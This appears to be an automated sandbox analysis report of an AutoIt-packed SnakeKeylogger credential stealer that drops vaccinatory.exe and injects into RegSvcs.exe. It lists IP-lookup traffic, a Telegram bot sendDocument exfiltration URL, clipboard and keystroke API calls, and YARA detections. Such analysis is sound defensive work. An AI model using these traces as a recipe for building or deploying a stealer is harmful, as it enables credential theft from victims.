Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org

Source: RegSvcs.exe, 00000004.00000002.2538888760.0000000002E60000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.2538612035.0000000002D90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: RegSvcs.exe, 0000000A.00000002.2538612035.0000000002D90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.comP
Source: RegSvcs.exe, 00000004.00000002.2538888760.0000000002E60000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.comX
Source: RegSvcs.exe, 00000004.00000002.2538888760.0000000002E60000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.2538612035.0000000002D90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.comd
Source: RegSvcs.exe, 00000004.00000002.2538888760.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.2538888760.0000000002E60000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.2538612035.0000000002D7E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.2538612035.0000000002D90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000004.00000002.2538888760.0000000002E33000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.2538888760.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.2538612035.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: RegSvcs.exe, 00000004.00000002.2538888760.0000000002E60000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.2538612035.0000000002D90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/d
Source: vaccinatory.exe, 00000003.00000002.1312119770.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.2536556876.0000000000413000.00000040.80000000.00040000.00000000.sdmp, vaccinatory.exe, 00000009.00000002.1428044082.00000000036B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: RegSvcs.exe, 00000004.00000002.2538888760.0000000002E60000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.2538612035.0000000002D90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.orgd
Source: RegSvcs.exe, 00000004.00000002.2538888760.0000000002E7D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.2538612035.0000000002DAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: RegSvcs.exe, 00000004.00000002.2538888760.0000000002E7D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.2538612035.0000000002DAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.orgd
Source: RegSvcs.exe, 00000004.00000002.2538888760.0000000002E33000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.2538612035.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 00000004.00000002.2536556876.0000000000413000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot-/sendDocume
Source: vaccinatory.exe, 00000003.00000002.1312119770.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, vaccinatory.exe, 00000009.00000002.1428044082.00000000036B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
Source: RegSvcs.exe, 00000004.00000002.2538888760.0000000002E60000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.2538612035.0000000002D90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: vaccinatory.exe, 00000003.00000002.1312119770.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.2538888760.0000000002E60000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.2536556876.0000000000413000.00000040.80000000.00040000.00000000.sdmp, vaccinatory.exe, 00000009.00000002.1428044082.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.2538612035.0000000002D90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 00000004.00000002.2538888760.0000000002E60000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.2538612035.0000000002D90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189d
Source: RegSvcs.exe, 00000004.00000002.2538888760.0000000002E60000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.2538612035.0000000002D90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l

Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756

Source: C:\Users\user\Desktop\tNXl4XhgmV.exe

Code function: 1_2_001F4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

1_2_001F4164

Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_001F4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		1_2_001F4164
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_00834164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		3_2_00834164

Source: C:\Users\user\Desktop\tNXl4XhgmV.exe

Code function: 1_2_001F3F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

1_2_001F3F66

Source: C:\Users\user\Desktop\tNXl4XhgmV.exe

Code function: 1_2_001E001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

1_2_001E001C

Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_0020CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		1_2_0020CABC
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_0084CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		3_2_0084CABC

System Summary

Malicious sample detected (through community Yara rule)

Source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.vaccinatory.exe.36b0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.vaccinatory.exe.36b0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.vaccinatory.exe.36b0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.vaccinatory.exe.36b0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.vaccinatory.exe.9e0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.vaccinatory.exe.9e0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.vaccinatory.exe.9e0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.vaccinatory.exe.9e0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000003.00000002.1312119770.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000003.00000002.1312119770.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000009.00000002.1428044082.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000009.00000002.1428044082.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: Process Memory Space: vaccinatory.exe PID: 7700, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: vaccinatory.exe PID: 8052, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: This is a third-party compiled AutoIt script.	1_2_00183B3A
Source: tNXl4XhgmV.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: tNXl4XhgmV.exe, 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_cf568c7a-9
Source: tNXl4XhgmV.exe, 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_01ca7200-8
Source: tNXl4XhgmV.exe, 00000001.00000003.1288936794.00000000038B3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_6495f73a-1
Source: tNXl4XhgmV.exe, 00000001.00000003.1288936794.00000000038B3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_4dc044da-7
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: This is a third-party compiled AutoIt script.	3_2_007C3B3A
Source: vaccinatory.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: vaccinatory.exe, 00000003.00000002.1311718824.0000000000874000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_20bc627e-9
Source: vaccinatory.exe, 00000003.00000002.1311718824.0000000000874000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_e7bff6c4-4
Source: vaccinatory.exe, 00000009.00000002.1425689472.0000000000874000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_290bfd57-1
Source: vaccinatory.exe, 00000009.00000002.1425689472.0000000000874000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_40b8128c-d
Source: tNXl4XhgmV.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_5af4b232-8
Source: tNXl4XhgmV.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_a99e274e-3
Source: vaccinatory.exe.1.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_233b0026-d
Source: vaccinatory.exe.1.dr	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_f487b8de-8

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\tNXl4XhgmV.exe

Code function: 1_2_001EA1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

1_2_001EA1EF

Source: C:\Users\user\Desktop\tNXl4XhgmV.exe

Code function: 1_2_001D8310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

1_2_001D8310

Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_001E51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		1_2_001E51BD
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_008251BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		3_2_008251BD

Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_0018E6A0	1_2_0018E6A0
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_001AD975	1_2_001AD975
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_001A21C5	1_2_001A21C5
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_001B62D2	1_2_001B62D2
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_002003DA	1_2_002003DA
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_001B242E	1_2_001B242E
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_001A25FA	1_2_001A25FA
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_001DE616	1_2_001DE616
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_001966E1	1_2_001966E1
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_001B878F	1_2_001B878F
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_00198808	1_2_00198808
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_001B6844	1_2_001B6844
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_00200857	1_2_00200857
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_001E8889	1_2_001E8889
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_001ACB21	1_2_001ACB21
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_001B6DB6	1_2_001B6DB6
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_00196F9E	1_2_00196F9E
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_00193030	1_2_00193030
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_001A3187	1_2_001A3187
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_001AF1D9	1_2_001AF1D9
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_00181287	1_2_00181287
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_001A1484	1_2_001A1484
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_00195520	1_2_00195520
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_001A7696	1_2_001A7696
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_00195760	1_2_00195760
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_001A1978	1_2_001A1978
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_001B9AB5	1_2_001B9AB5
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_0018FCE0	1_2_0018FCE0
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_001A1D90	1_2_001A1D90
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_001ABDA6	1_2_001ABDA6
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_00207DDB	1_2_00207DDB
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_0018DF00	1_2_0018DF00
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_00193FE0	1_2_00193FE0
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_01163B28	1_2_01163B28
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_007CE6A0	3_2_007CE6A0
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_007ED975	3_2_007ED975
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_007E21C5	3_2_007E21C5
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_007F62D2	3_2_007F62D2
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_008403DA	3_2_008403DA
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_007F242E	3_2_007F242E
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_007E25FA	3_2_007E25FA
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_0081E616	3_2_0081E616
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_007D66E1	3_2_007D66E1
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_007F878F	3_2_007F878F
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_00828889	3_2_00828889
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_007F6844	3_2_007F6844
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_007D8808	3_2_007D8808
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_00840857	3_2_00840857
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_007ECB21	3_2_007ECB21
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_007F6DB6	3_2_007F6DB6
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_007D6F9E	3_2_007D6F9E
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_007D3030	3_2_007D3030
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_007EF1D9	3_2_007EF1D9
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_007E3187	3_2_007E3187
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_007C1287	3_2_007C1287
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_007E1484	3_2_007E1484
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_007D5520	3_2_007D5520
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_007E7696	3_2_007E7696
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_007D5760	3_2_007D5760
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_007E1978	3_2_007E1978
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_007F9AB5	3_2_007F9AB5
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_007CFCE0	3_2_007CFCE0
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_00847DDB	3_2_00847DDB
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_007EBDA6	3_2_007EBDA6
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_007E1D90	3_2_007E1D90
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_007CDF00	3_2_007CDF00
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_007D3FE0	3_2_007D3FE0
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_01281010	3_2_01281010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013127B9	4_2_013127B9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01312DD1	4_2_01312DD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0131ACA0	4_2_0131ACA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013119B8	4_2_013119B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01319BEC	4_2_01319BEC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0131A584	4_2_0131A584
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0131AC90	4_2_0131AC90
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 9_2_012635B8	9_2_012635B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_010AE228	10_2_010AE228
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_010A27B9	10_2_010A27B9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_010A2DD1	10_2_010A2DD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_010AB3C8	10_2_010AB3C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_010A9F80	10_2_010A9F80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_010AA8A4	10_2_010AA8A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_010AB3B8	10_2_010AB3B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_010AF680	10_2_010AF680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_063C5DEC	10_2_063C5DEC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_063CB650	10_2_063CB650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_063C31E0	10_2_063C31E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_063C6C70	10_2_063C6C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_063C4A60	10_2_063C4A60

Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: String function: 001A0AE3 appears 70 times
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: String function: 001A8900 appears 42 times
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: String function: 00187DE1 appears 36 times
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: String function: 007C7DE1 appears 35 times
